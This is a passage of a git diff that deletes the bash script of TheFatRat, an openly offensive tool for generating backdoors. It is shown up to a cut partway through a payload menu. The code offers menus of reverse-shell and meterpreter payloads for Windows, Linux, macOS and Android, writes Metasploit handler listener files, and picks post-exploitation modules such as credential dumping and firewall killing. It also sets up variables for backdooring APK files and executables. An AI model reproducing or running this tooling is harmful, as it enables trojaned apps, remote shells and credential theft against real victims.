diff --git a/fatrat b/fatrat deleted file mode 100755 index 73d253a..0000000 --- a/fatrat +++ /dev/null @@ -1,6265 +0,0 @@ -#!/usr/bin/env bash - -#-Metadata----------------------------------------------------# -# Filename: TheFatRat(v1.9.8#dev) (Update: 2022-01-27) # -#-Info--------------------------------------------------------# -# TheFatRat - A Massive Exploiting Tool # -#-Author(s)---------------------------------------------------# -# Edo maland ~ @screetsec # -#-Operating System--------------------------------------------# -# Designed for & tested on: Linux # -# Reported working : Ubuntu 16 # -# : Parrot # -# : BlackArch # -# : Kali Linux # -# : Backbox # -# Available on BlackArch Linux # -#-Licence-----------------------------------------------------# -# GNU General Public License v3.0 # -#-------------------------------------------------------------# - - -#COLOUR -cyan='\e[0;36m' -green='\e[0;34m' -okegreen='\033[92m' -lightgreen='\e[1;32m' -white='\e[1;37m' -red='\e[1;31m' -yellow='\e[0;33m' -BlueF='\e[1;34m' #Biru -RESET="\033[00m" #normal -orange='\e[38;5;166m' - -#Accurate method to detect user Distro -lnx="Linux" -lsb_release -i > temp/distro.tmp -lsb_release -c > temp/codename.tmp -rlname=$(awk '{print $2}' temp/codename.tmp) -dist=$(awk '{print $3}' temp/distro.tmp) -dist1=$(awk '{print $4}' temp/distro.tmp) -rm -f temp/codename.tmp >/dev/null -rm -f temp/distro.tmp >/dev/null - -if [[ "$dist" == "$lnx" ]]; then - dist0="$dist1" - else - dist0="$dist" -fi - -#VARIABLE -path=$(pwd) - -if [[ -f "${path}/release" ]]; then - Versi=$(sed -n 1p < "$path/release") - else - echo "" - echo -e "$red""* - Version Control File Not Found" - echo "" - echo -ne "$okegreen""* - Updating FatRat Main Files ....." - -# Cleaning Old Version - rm -f "${path}/fatrat" >/dev/null 2>&1 - rm -f "${path}/setup.sh" >/dev/null 2>&1 - rm -f "${path}/grab.sh" >/dev/null 2>&1 - rm -f "${path}/update" >/dev/null 2>&1 - rm -f "${path}/backdoor_apk" >/dev/null 2>&1 - -# Getting New Files on Repositoy The FatRat - wget https://raw.githubusercontent.com/Screetsec/TheFatRat/master/fatrat -O "${path}/fatrat" >/dev/null 2>&1 - wget https://raw.githubusercontent.com/Screetsec/TheFatRat/master/setup.sh -O "${path}/setup.sh" >/dev/null 2>&1 - wget https://raw.githubusercontent.com/Screetsec/TheFatRat/master/grab.sh -O "${path}/grab.sh" >/dev/null 2>&1 - wget https://raw.githubusercontent.com/Screetsec/TheFatRat/master/update -O "${path}/update" >/dev/null 2>&1 - wget https://raw.githubusercontent.com/Screetsec/TheFatRat/master/release -O "${path}/release" >/dev/null 2>&1 - wget https://raw.githubusercontent.com/Screetsec/TheFatRat/master/backdoor_apk -O "${path}/backdoor_apk" >/dev/null 2>&1 - -# Give Permssion To New Files - chmod +x "${path}/fatrat" >/dev/null 2>&1 - chmod +x "${path}/setup.sh" >/dev/null 2>&1 - chmod +x "${path}/grab.sh" >/dev/null 2>&1 - chmod +x "${path}/update" >/dev/null 2>&1 - chmod +x "${path}/backdoor_apk" >/dev/null 2>&1 - echo "Done" - sleep 3 - echo "" - echo -e "$orange""Restart fatrat" - exit 1 -fi - -# Create Safe Measures For Old Versions -lstdir="${path}/output" -aplst="$path/backdoored" - -if [[ -d "${lstdir}" ]]; then - cp "$lstdir/*" "$output/" >/dev/null 2>&1 - rm -rf "$lstdir" >/dev/null 2>&1 - -if [[ -d "${aplst}" ]]; then - cp "$aplst/*" "$output/" >/dev/null 2>&1 - rm -rf "$aplst" >/dev/null 2>&1 -fi - - echo -e "$okegreen""All your old generated files in fatrat are now located in :" - echo -e "$orange""$output" - echo "" - rm "$path/config/config.path" >/dev/null 2>&1 - echo "" - echo "Setup for fatrat must run again due to version upgrades" - read -rsp $'Press [ENTER] key to Continue\n' -n 1 key -./setup.sh - exit 0 -fi -file="config/config.path" -#Check If Tools Path Config File Exists Before Proceeding -#Config File Exists, Then Load Tools Paths To Specific Variables -if [ -f "${file}" ]; then - msfconsole=$(sed -n 13p ${file}) - msfvenom=$(sed -n 14p ${file}) - backdoor=$(sed -n 15p ${file}) - searchsploit=$(sed -n 16p ${file}) - aapt=$(sed -n 10p ${file}) - apktool=$(sed -n 11p ${file}) - keytool=$(sed -n 7p ${file}) - sign=$(sed -n 5p ${file}) - dx=$(sed -n 9p ${file}) - baksmali=$(sed -n 12p ${file}) - output=$(sed -n 17p ${file}) -else - -#Config File Does Not Exist - echo -e $red"Configuration file does not exists, run setup.sh first for config ." - exit 1 -fi - -# VARIABLE GLOBAL -codename=Target -OS=$(uname) # Detect Distro -distro="$dist0" -disrov="$rlname" -SERVICE=service; -apkembed='tools/apkembed.rb' # exec script path -pwned='python tools/pw_exec.py' -dave='python tools/trusted_2_6.py' -B='tools/prog.cs' -C='tools/dad.c' -apache='tools/apache.c' -paycom="${output}/payload.c" -pdfcom="${output}/pdf.c" -bcom="${output}/Program.cs" -pdfcom="${output}/pdf.c" -pstager='tools/power.py' -apachecom="${output}/apache_com.c" -out="${output}/ip.txt" -pump='tools/pump.py' -dllcustom='temp/dll_cus.c' -reverse1='temp/reverse1.c' -stag='temp/stag.c' -apkconfig="${path}/config/apk.tmp" -unzip=unzip -temp="${path}/temp" -grab="config/grab.conf" -meterp="${path}/temp/meterpreter.rc" -outf="app_backdoor.apk" -msploit="${path}/logs/msploit.log" -lanip=$(ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'/') -lanip6=$(ip addr | grep 'state UP' -A4 | tail -n1 | awk '{print $2}' | cut -f1 -d'/') -publicip=$(dig +short myip.opendns.com @resolver1.opendns.com) -hostn=$(host "$publicip" | awk '{print $5}' | sed 's/.$//') -list="${path}/config/listeners" -log="${path}/logs/apk-old.log" -pwind="${path}/logs/pwind.log" -defcon="${path}/config/conf.def" -logfud="${path}/logs/fudwin.log" - - -# Spinner for Metasploit Generator -spinlong () -{ - echo -e "\n" - bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ " - barlength=${#bar} - i=0 - while ((i < 100)); do - n=$((i*barlength / 100)) - printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}" - ((i += RANDOM%5+2)) - sleep 0.02 - done -} - - -# Spinner For Random Seed Generator -spinlong2 () -{ - echo -e "\n" - bar=" 01100111001001001110111001101010101010110101001010111001010101010101010" - barlength=${#bar} - i=0 - while ((i < 100)); do - n=$((i*barlength / 100)) - printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}" - ((i += RANDOM%5+2)) - sleep 0.02 - done -} - -# Check if configuration file for grab script exists in /config folder -# Case grab config does not exist then create a default config with 60 seconds - -if [[ ! -f "$grab" ]]; then - echo "------------------------------------------------------------" > "$grab" - echo "| Timeout configuration for Msfconsole file Grabber Script |" >> "$grab" - echo "------------------------------------------------------------" >> "$grab" - echo "60" >> "$grab" -fi - -# Default Local Host & Port file creation function -function confdefault () { -clear -confd="$path/config/conf.def" -lh=$(sed -n 1p "$confd") -lp=$(sed -n 2p "$confd") - -if [[ -f "$confd" ]]; then -clear - echo -e "$okegreen"" " - echo "Fatrat detected that exists a default config file - with the following values :" - echo "" - echo "LHOST : $lh " - echo "LPORT : $lp " - echo "" - read -rsp $'Press [ENTER] key go to options menu \n' -n 1 key - echo "" - echo -e "$okegreen" "Select one of the options bellow" - echo "" - echo -e "$orange" "+---------------------------------+" - echo -e "$orange" "|$white [$okegreen 1$white ]$yellow Change current config$orange |" - echo -e "$orange" "|$white [$okegreen 2$white ]$yellow Delete configuration file$orange |" - echo -e "$orange" "|$white [$okegreen 3$white ]$yellow Cancel$orange |" - echo -e "$orange" "+---------------------------------+" - echo "" - echo -ne "$okegreen" "Option : ";tput sgr0 - read con - echo "" -case "$con" in - -1) -confd="$path/config/conf.def" - rm -rf "$confd" - touch "$confd" - clear - echo "" - echo -e "$okegreen" "Write Lhost value$yellow (ex: 192.168.1.1 or mydomain.com)" - echo -ne "$okegreen" "LHOST : ";tput sgr0 - read val - if [[ -z "$val" ]] - then - confdefault - else - echo "$val" > "$confd" - fi - echo "" - echo -e "$okegreen" "Write Lport value$yellow (Must be a port between 1 & 65535)" - echo -ne "LPORT : ";tput sgr0 - read val - if [[ -z "$val" ]]; then - confdefault - else - echo "$val" >> "$confd" - fi - - echo -e "$okegreen" "" - read -rsp $'Configuration created , restart fatrat , Press [ENTER] key to exit fatrat \n' -n 1 key - clear - -exit 0 -;; - -2) - clear - echo -e "$okegreen" "" - rm -rf "$confd" - echo "Default configuration file was deleted , you will now have - to input Lhost & Lport values manually in fatrat options ." - echo "" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - clear - menu - -;; - -3) - clear - menu - -;; - esac - -else - echo -e "$okegreen" "" - echo "No default configuration file detected " - read -rsp $'Press [ENTER] key to go to options \n' -n 1 key - echo "" - clear - echo -e "$okegreen" "Select one of the options bellow" - echo "" - echo -e "$orange" "+---------------------+" - echo -e "$orange" "|$white [$okegreen 1$white ]$yellow Create config$orange |" - echo -e "$orange" "|$white [$okegreen 2$white ]$yellow Cancel$orange |" - echo -e "$orange" "+---------------------+" - echo "" - echo -ne "$okegreen" "Option : ";tput sgr0 - read -r con - echo "" -case "$con" in -1) -confd="$path/config/conf.def" - touch "$confd" - echo "" - echo -e "$okegreen" "Write Lhost value$yellow (ex: 192.168.1.1 or mydomain.com)" - echo -ne "$okegreen" "LHOST : ";tput sgr0 - read -r val - if [[ -z "$val" ]]; then - confdefault - else - echo "$val" > "$confd" - fi - echo "" - echo -e "$okegreen" "Write Lport value$yellow (Must be a port between 1 & 65535)" - echo -ne "LPORT : ";tput sgr0 - read -r val - if [[ -z "$val" ]]; then - confdefault - else - echo "$val" >> "$confd" - fi - echo -e "$okegreen" "" - read -rsp $'Configuration created , restart fatrat , Press [ENTER] key to exit fatrat \n' -n 1 key - clear -exit 0 -;; - -2) - clear - menu -;; -*) - echo -e "$red" "" - read -rsp $ "Invalid Option" - confdefault -;; - esac -fi -} - -# Verify user Input Values on Manual LHOST, LPORT & FILENAME -function invalid (){ -err=0 -echo "" - -if [[ -z "$yourip" ]]; then - echo -e "$red" "" - echo "[ ! ] You must write an IP or Hostname ." - echo -e "$okegreen" "" - echo "IP Example : 192.168.1.34 - Domain Example : myhost.com" - err=1 -fi - echo "" -if [[ -z "$yourport" ]]; then - echo -e "$red" "" - echo "[ ! ] You must write a port number between 1 & 65535 ." - err=1 -fi - -if [[ -z "$fira" ]]; then - echo -e "$red" "" - echo "[ ! ] You must write a filename ." - echo -e "$okegreen" "" - echo "Filename Example : myfile" - err=1 -fi -echo -e "$okegreen" "" -} - -#Selection of Executable and verify if exists for backdoor-factory -function selexe(){ -echo "" - echo -e $okegreen "Enter the path to your EXE file .(ex: /root/downloads/myfile.exe)" - echo "" - echo -ne $cyan "Path : ";tput sgr0 - read -r exef - if [[ ! -f "$exef" ]] - then - echo "" - echo -e "$red" "File does not exist , make sure you write the right path of it ." - echo "" - echo -e "$okegreen" "Press [ENTER] key to try again ." - read -r cont - selexe - fi -} - -#Apk Embeded File Selection and Verify if User Path Is Correct -function selapk(){ -echo "" - echo -e $okegreen "Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)" - echo "" - echo -ne $cyan "Path : ";tput sgr0 - read exef - if [ ! -f $exef ] - then - echo "" - echo -e $red "File does not exist , make sure you write the right path of it ." - echo "" - echo -e $okegreen "Press [ENTER] key to try again ." - read cont - selapk - fi -} - -#Debian Embeded File Selection and Verify if User Path is Correct -function seldeb(){ -echo "" - echo -e $okegreen "Enter the path to your deb file .(ex: /root/downloads/dirbuster.deb)" - echo "" - echo -ne $cyan "Path : ";tput sgr0 - read exef - if [ ! -f $exef ] - then - echo "" - echo -e $red "File does not exist , make sure you write the right path of it ." - echo "" - echo -e $okegreen "Press [ENTER] key to try again ." - read cont - seldeb - fi -} - -#Verification of User input for Lhost & Lport Only -function invalid1(){ -err=0 -echo "" -if [ -z "$yourip" ]; then - echo -e $red "" - echo "[ ! ] You must write an IP or Hostname ." - echo -e $okegreen "" - echo "IP Example : 192.168.1.34 - Domain Example : myhost.com" - err=1 -fi - - echo "" -if [ -z "$yourport" ]; then - echo -e $red "" - echo "[ ! ] You must write a port number between 1 & 65535 ." - err=1 -fi - echo -e $okegreen "" -} - - -# This function is not active yet because user may input an hostame - -valid_ip(){ -# Verify if user ip input is valid -if [[ $yourip =~ ^[0-255]+\.[0-255]+\.[0-255]+\.[0-255]+$ ]]; then - echo "" - err=1 -else - err=0 -fi -} - -#Checking if your Command is correct -gboor(){ -echo -e $yellow "" -cat << ! - Generate Backdoor - +------------++-------------------------++-----------------------+ - | Name || Descript || Your Input - +------------++-------------------------++-----------------------+ - | LHOST || The Listen Addres || $yourip - | LPORT || The Listen Ports || $yourport - | OUTPUTNAME || The Filename output || $fira - | PAYLOAD || Payload To Be Used || $payload - +------------++-------------------------++-----------------------+ - - -! -} - -#Checking if your Command is Correct when embed backdoor -gboor2(){ -echo -e $ "" -cat << ! - Generate Backdoor - +------------++-------------------------++-----------------------+ - | Name || Descript || Your Input - +------------++-------------------------++-----------------------+ - | LHOST || The Listen Addres || $yourip - | LPORT || The Listen Ports || $yourport - | OUTPUTNAME || The Filename output || $outf - | PAYLOAD || Payload To Be Used || $payload - +------------++-------------------------++-----------------------+ - - -! -} - -function bkflst(){ - echo -e $okegreen "Do you want to create a listener for this configuration" - echo -e $okegreen "to use in msfconsole in future ?" - echo "" - echo -ne $cyan "Choose y/n : " - read sel - case $sel in - y|Y|Yes|yes|YES) - echo "" - echo -e $green "Write the name for this config . (ex : back-lst)" - echo -ne "Filename : ";tput sgr0 - read fname - if [ -z $fname ]; then - svf=$path/config/listeners/back-lst.rc - rm -rf $svf >/dev/null 2>&1 - echo "" - echo -e $orange " +-------------------------------------------+" - echo -e $orange " |$white [$okegreen 1$white ]$yellow windows/shell_bind_tcp$orange |" - echo -e $orange " |$white [$okegreen 2$white ]$yellow windows/shell/reverse_tcp$orange |" - echo -e $orange " |$white [$okegreen 3$white ]$yellow windows/meterpreter/reverse_tcp$orange |" - echo -e $orange " |$white [$okegreen 4$white ]$yellow windows/meterpreter/reverse_tcp_dns$orange |" - echo -e $orange " |$white [$okegreen 5$white ]$yellow windows/meterpreter/reverse_http$orange |" - echo -e $orange " |$white [$okegreen 6$white ]$yellow windows/meterpreter/reverse_https$orange |" - echo -e $orange " +-------------------------------------------+" - echo "" - echo -ne $okegreen " Choose Payload :";tput sgr0 - read pld - if [ $pld == "1" ]; then - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD windows/shell_bind_tcp" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/back-lst.rc" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - echo - clear - menu - - elif [ $pld == "2" ]; then - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD windows/shell/reverse_tcp" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/back-lst.rc" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - echo - clear - menu - - elif [ $pld == "3" ]; then - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD windows/meterpreter/reverse_tcp" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/back-lst.rc" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - echo - clear - menu - - elif [ $pld == "4" ]; then - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD windows/meterpreter/reverse_tcp_dns" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/back-lst.rc" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - echo - clear - menu - - elif [ $pld == "5" ]; then - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD windows/meterpreter/reverse_http" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/back-lst.rc" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - echo - clear - menu - - elif [ $pld == "6" ]; then - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD windows/meterpreter/reverse_https" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/back-lst.rc" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - echo - clear - menu - else - echo -e $red "Invalid option" - echo "" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - echo - clear - bkflst - fi - else - svf=$path/config/listeners/$fname.rc - rm -rf $fname >/dev/null 2>&1 - echo "" - echo -e $orange " +-------------------------------------------+" - echo -e $orange " |$white [$okegreen 1$white ]$yellow windows/shell_bind_tcp$orange |" - echo -e $orange " |$white [$okegreen 2$white ]$yellow windows/shell/reverse_tcp$orange |" - echo -e $orange " |$white [$okegreen 3$white ]$yellow windows/meterpreter/reverse_tcp$orange |" - echo -e $orange " |$white [$okegreen 4$white ]$yellow windows/meterpreter/reverse_tcp_dns$orange |" - echo -e $orange " |$white [$okegreen 5$white ]$yellow windows/meterpreter/reverse_http$orange |" - echo -e $orange " |$white [$okegreen 6$white ]$yellow windows/meterpreter/reverse_https$orange |" - echo -e $orange " +-------------------------------------------+" - echo "" - echo -ne $okegreen " Choose Payload :";tput sgr0 - read pld - - if [ $pld == "1" ]; then - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD windows/shell_bind_tcp" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/$fname.rc" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - echo - clear - menu - - elif [ $pld == "2" ]; then - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD windows/shell/reverse_tcp" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/$fname.rc" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - echo - clear - menu - - elif [ $pld == "3" ]; then - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD windows/meterpreter/reverse_tcp" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/$fname.rc" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - echo - clear - menu - - elif [ $pld == "4" ]; then - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD windows/meterpreter/reverse_tcp_dns" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/$fname.rc" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - echo - clear - menu - - elif [ $pld == "5" ]; then - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD windows/meterpreter/reverse_http" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/$fname.rc" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - echo - clear - menu - - elif [ $pld == "6" ]; then - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD windows/meterpreter/reverse_https" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/$fname.rc" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - echo - clear - menu - else - echo -e $red "Invalid option" - echo "" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - echo - clear - bkflst - fi - fi - ;; - - n|no|No|NO) - echo -e $okegreen "" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - echo - clear - menu - ;; - - *) - clear - menu - ;; - esac -} - -# Function to Create a Listener For APK -function crlst(){ - echo -e $okegreen "Do you want to create a listener for this configuration" - echo -e $okegreen "to use in msfconsole in future ?" - echo "" - echo -ne $cyan "Choose y/n : " - read sel - case $sel in - y|Y|Yes|yes|YES) - echo "" - echo -e $green "Write the name for this config . (ex : myratapk)" - echo -ne "Filename : ";tput sgr0 - read fname - if [ -z $fname ]; then - svf=$path/config/listeners/myratapk.rc - rm -rf $svf >/dev/null 2>&1 - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD $payload" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit -j" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/myratapk.rc" - else - - svf=$path/config/listeners/$fname.rc - rm -rf $svf >/dev/null 2>&1 - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD $payload" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit -j" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/$fname.rc" - fi - echo -e $okegreen "" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - echo - clear - menu - ;; - - n|no|No|NO) - echo -e $okegreen "" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - echo - clear - menu - ;; - - *) - clear - menu - ;; - esac -} - -#Post Exploit Menu Selection -function postexp(){ - echo "" - echo -e $orange " +------------------------------------+" - echo -e $orange " |$white [$okegreen 1$white ]$yellow sysinfo.rc$orange |" - echo -e $orange " |$white [$okegreen 2$white ]$yellow fast_migrate.rc$orange |" - echo -e $orange " |$white [$okegreen 3$white ]$yellow cred_dump.rc$orange |" - echo -e $orange " |$white [$okegreen 4$white ]$yellow gather.rc$orange |" - echo -e $orange " |$white [$okegreen 5$white ]$yellow auto_migrate+killfirewall.rc$orange |" - echo -e $orange " +------------------------------------+" - echo "" - echo -ne $okegreen " Choose Post Exploitation Module : ";tput sgr0 - read pemd - case $pemd in - 1) - pe="$path/postexploit/sysinfo.rc" - ;; - - 2) - pe="$path/postexploit/fast_migrate.rc" - ;; - - 3) - pe="$path/postexploit/cred_dump.rc" - ;; - - 4) - pe="$path/postexploit/gather.rc" - ;; - - 5) - pe="$path/postexploit/auto_migrate+killfirewall.rc" - ;; - - *) - postexp - ;; - esac -} - -# Backdoor-Factory Menu Payload Selection -# Reference : https://github.com/secretsquirrel/the-backdoor-factory - -function pldbkf(){ - echo "" - echo -e $orange " +--------------------------------------------+" - echo -e $orange " |$white [$okegreen 1$white ]$yellow cave_miner_inline$orange |" - echo -e $orange " |$white [$okegreen 2$white ]$yellow iat_reverse_tcp_inline$orange |" - echo -e $orange " |$white [$okegreen 3$white ]$yellow iat_reverse_tcp_inline_threaded$orange |" - echo -e $orange " |$white [$okegreen 4$white ]$yellow iat_reverse_tcp_stager_threaded$orange |" - echo -e $orange " |$white [$okegreen 5$white ]$yellow iat_user_supplied_shellcode_threaded$orange |" - echo -e $orange " |$white [$okegreen 6$white ]$yellow meterpreter_reverse_https_threaded$orange |" - echo -e $orange " |$white [$okegreen 7$white ]$yellow reverse_shell_tcp_inline$orange |" - echo -e $orange " |$white [$okegreen 8$white ]$yellow reverse_tcp_stager_threaded$orange |" - echo -e $orange " |$white [$okegreen 9$white ]$yellow user_supplied_shellcode_threaded$orange |" - echo -e $orange " +--------------------------------------------+" - echo "" - echo -ne $okegreen " Choose Payload : ";tput sgr0 - read pld - case $pld in - 1) - payload="cave_miner_inline" - ;; - - 2) - payload="iat_reverse_tcp_inline" - ;; - - 3) - payload="iat_reverse_tcp_inline_threaded" - ;; - - 4) - payload="iat_reverse_tcp_stager_threaded" - ;; - - 5) - payload="iat_user_supplied_shellcode_threaded" - ;; - - 6) - payload="meterpreter_reverse_https_threaded" - ;; - - 7) - payload="reverse_shell_tcp_inline" - ;; - - 8) - payload="reverse_tcp_stager_threaded" - ;; - - 9) - payload="user_supplied_shellcode_threaded" - ;; - - *) - echo "" - echo -ne $red "Wrong input , choose between 1 and 9 :" - pldbkf - ;; - esac -} - -# Linux MSFVENOM Payload Selection -# Manual Generation : https://www.offensive-security.com/metasploit-unleashed/msfvenom/ - -function pldlnx(){ - echo "" - echo -e $orange " +-----------------------------------------+" - echo -e $orange " |$white [$okegreen 1$white ]$yellow linux/ppc/shell_reverse_tcp$orange |" - echo -e $orange " |$white [$okegreen 2$white ]$yellow linux/x86/shell_reverse_tcp$orange |" - echo -e $orange " |$white [$okegreen 3$white ]$yellow linux/x86/meterpreter/reverse_tcp$orange |" - echo -e $orange " |$white [$okegreen 4$white ]$yellow osx/armle/shell_reverse_tcp$orange |" - echo -e $orange " |$white [$okegreen 5$white ]$yellow osx/ppc/shell_reverse_tcp$orange |" - echo -e $orange " |$white [$okegreen 6$white ]$yellow bsd/x86/shell/reverse_tcp$orange |" - echo -e $orange " |$white [$okegreen 7$white ]$yellow solaris/x86/shell_reverse_tcp$orange |" - echo -e $orange " +-----------------------------------------+" - echo "" - echo -ne $okegreen " Choose Payload : ";tput sgr0 - read pld - case $pld in - 1) - payload="linux/ppc/shell_reverse_tcp" - ;; - - 2) - payload="linux/x86/shell_reverse_tcp" - ;; - - 3) - payload="linux/x86/meterpreter/reverse_tcp" - ;; - - 4) - payload="osx/armle/shell_reverse_tcp" - ;; - - 5) - payload="osx/ppc/shell_reverse_tcp" - ;; - - 6) - payload="bsd/x86/shell/reverse_tcp" - ;; - - 7) - payload="solaris/x86/shell_reverse_tcp" - ;; - - *) - echo "" - echo -ne $red "Wrong input , choose between 1 and 7 :" - pldlnx - ;; - esac -} - -# Windows MSFVENOM Payload Selection -# Manual Generation : https://www.offensive-security.com/metasploit-unleashed/msfvenom/ - -function pldwin(){ - echo "" - echo -e $orange " +-------------------------------------------+" - echo -e $orange " |$white [$okegreen 1$white ]$yellow windows/shell_bind_tcp$orange |" - echo -e $orange " |$white [$okegreen 2$white ]$yellow windows/shell/reverse_tcp$orange |" - echo -e $orange " |$white [$okegreen 3$white ]$yellow windows/meterpreter/reverse_tcp$orange |" - echo -e $orange " |$white [$okegreen 4$white ]$yellow windows/meterpreter/reverse_tcp_dns$orange |" - echo -e $orange " |$white [$okegreen 5$white ]$yellow windows/meterpreter/reverse_http$orange |" - echo -e $orange " |$white [$okegreen 6$white ]$yellow windows/meterpreter/reverse_https$orange |" - echo -e $orange " +-------------------------------------------+" - echo "" - echo -ne $okegreen " Choose Payload :";tput sgr0 - read pld - case $pld in - 1) - payload="windows/shell_bind_tcp" - ;; - - 2) - payload="windows/shell/reverse_tcp" - ;; - - 3) - payload="windows/meterpreter/reverse_tcp" - ;; - - 4) - payload="windows/meterpreter/reverse_tcp_dns" - ;; - - 5) - payload="windows/meterpreter/reverse_http" - ;; - - 6) - payload="windows/meterpreter/reverse_https" - ;; - - *) - echo "" - echo -e $red "Wrong input , choose between 1 and 6" - pldwin - ;; - esac -} - -# Android msfvenom payload selection -function pldand () { - echo "" - echo -e $orange " +-------------------------------------------+" - echo -e $orange " |$white [$okegreen 1$white ]$yellow android/meterpreter/reverse_http$orange |" - echo -e $orange " |$white [$okegreen 2$white ]$yellow android/meterpreter/reverse_https$orange |" - echo -e $orange " |$white [$okegreen 3$white ]$yellow android/meterpreter/reverse_tcp$orange |" - echo -e $orange " |$white [$okegreen 4$white ]$yellow android/shell/reverse_http$orange |" - echo -e $orange " |$white [$okegreen 5$white ]$yellow android/shell/reverse_https$orange |" - echo -e $orange " |$white [$okegreen 6$white ]$yellow android/shell/reverse_tcp$orange |" - echo -e $orange " +-------------------------------------------+" - echo "" - echo -ne $okegreen " Choose Payload : ";tput sgr0 - read pld - case $pld in - 1) - payload="android/meterpreter/reverse_http" - ;; - - 2) - payload="android/meterpreter/reverse_https" - ;; - - 3) - payload="android/meterpreter/reverse_tcp" - ;; - - 4) - payload="android/shell/reverse_http" - ;; - - 5) - payload="android/shell/reverse_https" - ;; - - 6) - payload="android/shell/reverse_tcp" - ;; - - *) - echo "" - echo -e $red "Wrong input , choose between 1 and 6" - pldand - ;; - esac -} - -# MAC MSFVENOM Payload Selection -function pldmac(){ - echo "" - echo -e $orange " +--------------------------------------+" - echo -e $orange " |$white [$okegreen 1$white ]$yellow python/meterpreter/reverse_tcp$orange |" - echo -e $orange " |$white [$okegreen 2$white ]$yellow generic/shell_reverse_tcp$orange |" - echo -e $orange " +--------------------------------------+" - echo "" - echo -ne $okegreen " Choose Payload : ";tput sgr0 - read pld - case $pld in - 1) - payload="python/meterpreter/reverse_tcp" - ;; - - 2) - payload="generic/shell_reverse_tcp" - ;; - - *) - echo "" - echo -e $red "Wrong input , choose between 1 and 2" - pldmac - ;; - esac -} - -# Linux multi msfvenom payload selection -function pldmul() { - echo "" - echo -e $orange " +------------------------------------------+" - echo -e $orange " |$white [$okegreen 1$white ]$yellow python/meterpreter/reverse_tcp$orange |" - echo -e $orange " |$white [$okegreen 2$white ]$yellow python/meterpreter/reverse_http$orange |" - echo -e $orange " |$white [$okegreen 3$white ]$yellow python/meterpreter/reverse_https$orange |" - echo -e $orange " |$white [$okegreen 4$white ]$yellow python/meterpreter_reverse_http$orange |" - echo -e $orange " |$white [$okegreen 5$white ]$yellow python/meterpreter_reverse_https$orange |" - echo -e $orange " |$white [$okegreen 6$white ]$yellow 